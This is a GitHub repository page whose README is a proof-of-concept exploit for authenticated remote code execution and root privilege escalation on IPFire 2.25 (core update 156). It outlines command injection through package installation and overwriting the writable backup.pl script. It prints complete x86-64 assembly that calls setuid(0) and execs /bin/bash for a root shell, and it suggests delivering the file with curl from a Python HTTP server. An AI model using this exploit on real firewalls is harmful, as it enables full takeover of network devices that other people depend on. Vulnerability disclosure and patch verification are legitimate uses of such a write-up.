Skip to content

MucahitSaratar/ipfire-2-25-auth-rce

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
www
 
 
 
 
 
 
 
 

Ipfire 2-25 (core update 156) authenticated rce

  • system run command when install any packet

packfileinstallation

  • system getting 7zip from just html

pocpc0

  • and check the tmp directory

pocpc1

  • version 2.25 - core update 156

version

  • ipfire allows run arbitrary os command as nobody after login

Be root!

  • check the suid binaries

find-suid

  • backup program run another script. /var/ipfire/backup/bin/backup.pl (it is a bash script and permission is looky good)

backup-tespiti

  • try the write in to bash script. (No error. GOOD!)

yazma-denemesi

  • try run bash

yazabilme-kanıtı

  • yes. we can run but it is low-privegled. we must trig to setuid(0)!
  • save this and run alti name.asm q
  • alti is my own compile-check program in soo_deep repo.
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • and write the new program to /var/ipfire/backup/bin/backup.pl. (we can python http server and curl to write)

  • and enjoy the root shell!

image

About

ipfire 2.25 authenticated remote code execution

Topics

Resources

Stars

Watchers

Forks